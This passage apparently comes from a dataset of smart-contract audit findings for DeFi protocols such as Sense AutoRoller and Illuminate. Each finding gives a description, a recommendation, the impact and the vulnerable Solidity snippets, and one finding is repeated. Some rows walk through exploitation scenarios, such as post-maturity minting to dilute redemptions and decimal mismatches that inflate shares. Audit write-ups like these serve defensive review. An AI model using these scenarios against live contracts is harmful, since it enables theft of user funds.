0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. 
Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\n",Round up in previewWithdraw using mulDivUp and divWadUp,"Other protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.","```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n" +Funding Rate calculation is not correct,medium,"According to the docs, the Funding Rate is intended to correspond to the gap between long and short positions that the Float Pool is required to make up. 
However, as it's implemented, the `totalFunding` is calculated only on the size of the overbalanced position, leading to some unexpected situations.\\nAccording to the comments, `totalFunding` is meant to be calculated as follows:\\ntotalFunding is calculated on the notional of between long and short liquidity and 2x long and short liquidity.\\nThis makes sense. The purpose of the funding rate is to compensate the Float Pool for the liquidity provided to balance the market.\\nHowever, the implementation of this function does not accomplish this. Instead, `totalFunding` is based only on the size of the overbalancedValue:\\n```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n\\nThis can be summarized as `2 * overbalancedValue * funding rate percentage * epochs / yr`.\\nThis formula can cause problems, because the size of the overbalanced value doesn't necessarily correspond to the balancing required for the Float Pool.\\nFor these examples, let's set:\\n`fundingRateMultiplier = 100` (1%)\\n`EPOCH_LENGTH() = 3.6525 days` (1% of a year)\\nSITUATION A:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000_000 ether\\nShort Effective Liquidity: 999_999 ether\\n`totalFunding = 2 * 1_000_000 ether * 1% * 1% = 200 ether`\\nAmount of balancing supplied by Float = 1mm - 999,999 = 1 ether\\nSITUATION B:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000 ether\\nShort Effective Liquidity: 100 ether\\n`totalFunding = 2 * 1_000 ether * 1% * 1% = 0.2 ether`\\nAmount of balancing supplied by Float = 1000 - 100 = 900 ether\\nWe can see that in Situation B, Float supplied 900X more liquidity to the system, and earned 1000X less fees.",Adjust the `totalFunding` formula to represent the stated outcome.
A simple example of how that might be accomplished is below, but I'm sure there are better implementations:\\n```\\nuint256 totalFunding = ((overbalancedValue - underbalancedValue) * fundingRateMultiplier * oracle.EPOCH_LENGTH()) / (365.25 days * 10_000);\\n```\\n","Funding Rates will not accomplish the stated objective, and will serve to incentivize pools that rely heavily on Float for balancing, while disincentivizing large, balanced markets.",```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n +Hardcoded divider address in RollerUtils is incorrect and will brick autoroller,medium,"RollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. 
If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.",RollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.,Incorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adapters,```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n +AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0,medium,"AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = 
previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. 
Or previewedLPBal * total could just be small and the division is truncated to 0.","We recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.",calling roll would revert and the new sponsored series cannot be started properly.,"```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n" +AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0,medium,"AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to 
address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. 
_space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.","We recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.",calling roll would revert and the new sponsored series cannot be started properly.,"```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n" +Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.,medium,"Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. 
If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. 
Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\n",Round up in previewWithdraw using mulDivUp and divWadUp,"Other protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.","```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n" +Lender#lend for Sense has mismatched decimals,high,"The decimals of the Sense principal token don't match the decimals of the ERC5095 vault it mints shares to. 
This can be abused on the USDC market to mint a large number of shares to steal yield from all other users.\\n```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n\\nSense principal tokens for DIA and USDC are 8 decimals to match the decimals of the underlying cTokens, cUSDC and cDAI. The decimals of the ERC5095 vault matches the underlying of the vault. This creates a disparity in decimals that aren't adjusted for in Lender#lend for Sense, which assumes that the vault and Sense principal tokens match in decimals. In the example of USDC the ERC5095 will be 6 decimals but the sense token will be 8 decimals. Each 1e6 USDC token will result in ~1e8 Sense tokens being received. Since the contract mints based on the difference in the number of sense tokens before and after the call, it will mint ~100x the number of vault shares than it should. 
Since the final yield is distributed pro-rata to the number of shares, the user who minted with sense will be entitled to much more yield than they should be and everyone else will get substantially less.",Issue Lender#lend for Sense has mismatched decimals\\nQuery the decimals of the Sense principal and use that to adjust the decimals to match the decimals of the vault.,User can mint large number of shares to steal funds from other users,"```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n" +Lend or mint after maturity,high,"The protocol does not forbid lending or minting after the maturity leaving the possibility to profit from early users.\\nLet's take the mint function as an example:\\n```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n\\nIt is a simple function that accepts the principal token and mints the corresponding ERC5095 tokens in return. 
There are no restrictions on timing, the user can mint even after the maturity. Malicious actors can take this as an advantage to pump their bags on behalf of legitimate early users.\\nScenario:\\nLegitimate users lend and mint their ERC5095 tokens before maturity.\\nWhen the maturity kicks in, lender tokens are redeemed and holdings are updated.\\nLegitimate users try to redeem their ERC5095 for the underlying tokens. The formula is `(amount * holdings[u][m]) / token.totalSupply();`\\nA malicious actor sandwiches legitimate users, and mints the ERC5095 thus increasing the totalSupply and reducing other user shares. Then redeem principals again and burn their own shares for increased rewards.\\nExample with concrete values:\\nuserA deposits `100` tokens, user B deposits `200` tokens. The total supply minted is `300` ERC5095 tokens.\\nAfter the maturity the redemption happens and now let's say `holdings[u][m]` is `330` (+30).\\nuserA tries to redeem the underlying. The expected amount is: `100` * `330` / `300` = 110. However, this action is frontrunned by userC (malicious) who mints yet another `500` tokens post-maturity. The total supply becomes `800`. The real value userA now receives is: 110 * `330` / `800` = 45.375.\\nAfter that the malicious actor userC invokes the redemption again, and the `holdings[u][m]` is now `330` - 45.375 + `550` = 834.625.\\nuserC redeems the underlying: `500` * 834.625 / 700 ~= 596.16 (expected was 550).\\nNow all the remaining users will also slightly benefit, e.g. 
in this case userB redeems what's left: `200` * 238.46 / `200` = 238.46 (expected was 220).",Issue Lend or mint after maturity\\nLend/mint should be forbidden post-maturity.,"The amount legitimate users receive will be devalued, while a malicious actor can increase their ROI without meaningfully contributing to the protocol and locking their tokens.","```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n" +Incorrect parameters,medium,"Some functions and integrations receive the wrong parameters.\\nHere, this does not work:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n\\nbecause it basically translates to:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n if (a != address(0)) {\\n Safe.approve(IERC20(address(0)), a, type(uint256).max);\\n }\\n```\\n\\nIt tries to approve a non-existing token. 
It should approve the underlying token and Notional's token contract.\\nAnother issue is with Tempus here:\\n```\\n // Swap on the Tempus Router using the provided market and params\\n ITempus(controller).depositAndFix(x, lent, true, r, d);\\n\\n // Calculate the amount of Tempus principal tokens received after the deposit\\n uint256 received = IERC20(principal).balanceOf(address(this)) - start;\\n\\n // Verify that a minimum number of principal tokens were received\\n if (received < r) {\\n revert Exception(11, received, r, address(0), address(0));\\n }\\n```\\n\\nIt passes `r` as a slippage parameter and later checks that received >= `r`. However, in Tempus this parameter is not exactly the minimum amount to receive, it is the ratio which is calculated as follows:\\n```\\n /// @param minTYSRate Minimum exchange rate of TYS (denominated in TPS) to receive in exchange for TPS\\n function depositAndFix(\\n ITempusAMM tempusAMM,\\n uint256 tokenAmount,\\n bool isBackingToken,\\n uint256 minTYSRate,\\n uint256 deadline\\n ) external payable nonReentrant {\\n// rest of code\\n uint256 minReturn = swapAmount.mulfV(minTYSRate, targetPool.backingTokenONE());\\n```\\n","Review all the integrations and function invocations, and make sure the appropriate parameters are passed.","Inaccurate parameter values may lead to protocol misfunction down the road, e.g. insufficient approval or unpredicted slippage.","```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n" +Sense PT redemptions do not allow for known loss scenarios,medium,"Sense PT redemptions do not allow for known loss scenarios, which will lead to principal losses\\nThe Sense PT redemption code in the `Redeemer` expects any losses during redemption to be due to a malicious adapter, and requires that there be no losses. 
However, there are legitimate reasons for there to be losses which aren't accounted for, which will cause the PTs to be unredeemable. The Lido FAQ page lists two such reasons:\\n```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n\\nIf Lido is slashed, or there are withdrawal restrictions, the Sense series sponsor will be forced to settle the series, regardless of the exchange rate (or miss out on their rewards). The Sense `Divider` contract anticipates and properly handles these losses, but the Illuminate code does not.\\nLido is just one example of a Sense token that exists in the Illuminate code base - there may be others added in the future which also require there to be allowances for losses.",Allow losses during redemption if Sense's `Periphery.verified()` returns `true`,"Permanent freezing of funds\\nThere may be a malicious series sponsor that purposely triggers a loss, either by DOSing Lido validators, or by withdrawing enough to trigger withdrawal restrictions. 
In such a case, the exchange rate stored by Sense during the settlement will lead to losses, and users that hold Illumimate PTs (not just the users that minted Illuminate PTs with Sense PTs), will lose their principal, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token.\\nWhile the Illuminate project does have an emergency `withdraw()` function that would allow an admin to rescue the funds and manually distribute them, this would not be trustless and defeats the purpose of having a smart contract.","```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. 
Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n" +Notional PT redemptions do not use flash-resistant prices,medium,"Notional PT redemptions do not use the correct function for determining balances, which will lead to principal losses\\nEIP-4626 states the following about maxRedeem():\\n```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n\\nThe above means that the implementer is free to return less than the actual balance, and is in fact required to return zero if the token's backing store is paused, and Notional's can be paused. While neither of these conditions currently apply to the existing wfCashERC4626 implementation, there is nothing stopping Notional from implementing the MUST-return-zero-if-paused fix tomorrow, or from changing their implementation to one that requires `maxRedeem()` to return something other than the current balance.","Use `balanceOf()` rather than `maxRedeem()` in the call to `INotional.redeem()`, and make sure that Illuminate PTs can't be burned if `Lender` still has Notional PTs that it needs to redeem (based on its own accounting of what is remaining, not based on balance checks, so that it can't be griefed with dust).","Permanent freezing of funds\\nIf `maxRedeem()` were to return zero, or some other non-exact value, fewer Notional PTs would be redeemed than are available, and users that redeem()ed their shares, would receive fewer underlying (principal if they minted Illuminate PTs with Notional PTs, e.g. to be an LP in the pool) than they are owed. 
The Notional PTs that weren't redeemed would still be available for a subsequent call, but if a user already redeemed their Illuminate PTs, their loss will already be locked in, since their Illuminate PTs will have been burned. This would affect ALL Illuminate PT holders of a specific market, not just the ones that provided the Notional PTs, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token. Markets that are already live with Notional set cannot be protected via a redemption pause by the Illuminate admin, because redemption of Lender's external PTs for underlying does not use the `unpaused` modifier, and does have any access control.","```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n" +Marketplace.setPrincipal do not approve needed allowance for Element vault and APWine router,medium,`Marketplace.setPrincipal` do not approve needed allowance for `Element vault` and `APWine router`\\n`Marketplace.setPrincipal` is used to provide principal token for the base token and maturity when it was not set yet. To set PT you also provide protocol that this token belongs to.\\nIn case of `APWine` protocol there is special block of code to handle all needed allowance. But it is not enough.\\n```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n\\nBut in `setPrincipal` we don't have such params and allowance is not set. 
So `Lender` will not be able to work with that tokens correctly.,"Add 2 more params as in `createMarket` and call `ILender(lender).approve(u, e, a, address(0));`",Lender will not provide needed allowance and protocol integration will fail.,```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n +ERC5095.mint function calculates slippage incorrectly,medium,"ERC5095.mint function calculates slippage incorrectly. This leads to lost of funds for user.\\n`ERC5095.mint` function should take amount of shares that user wants to receive and then buy this amount. It uses hardcoded 1% slippage when trades base tokens for principal. But it takes 1% of calculated assets amount, not shares.\\n```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nThis is how slippage is provided\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n```\\n\\nBut the problem is that assets it is amount of base tokens that user should pay for the shares he want to receive. Slippage should be calculated using shares amount user expect to get.\\nExample. 
User calls mint and provides amount 1000. That means that he wants to get 1000 principal tokens. While converting to assets, assets = 990. That means that user should pay 990 base tokens to get 1000 principal tokens. Then the `sellUnderlying` is send and slippage provided is `990*0.99=980.1`. So when something happens with price it's possible that user will receive 980.1 principal tokens instead of 1000 which is 2% lost.\\nTo fix this you should provide `s - (s / 100)` as slippage.","Use this.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n s- (s / 100)\\n );\\n```\\n",Lost of users funds.,"```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n" +ERC5095.deposit doesn't check if received shares is less then provided amount,medium,"`ERC5095.deposit` doesn't check if received shares is less then provided amount. In some cases this leads to lost of funds.\\nThe main thing with principal tokens is to buy them when the price is lower (you can buy 101 token while paying only 100 base tokens) as underlying price and then at maturity time to get interest(for example in one month you will get 1 base token in our case).\\n`ERC5095.deposit` function takes amount of base token that user wants to deposit and returns amount of shares 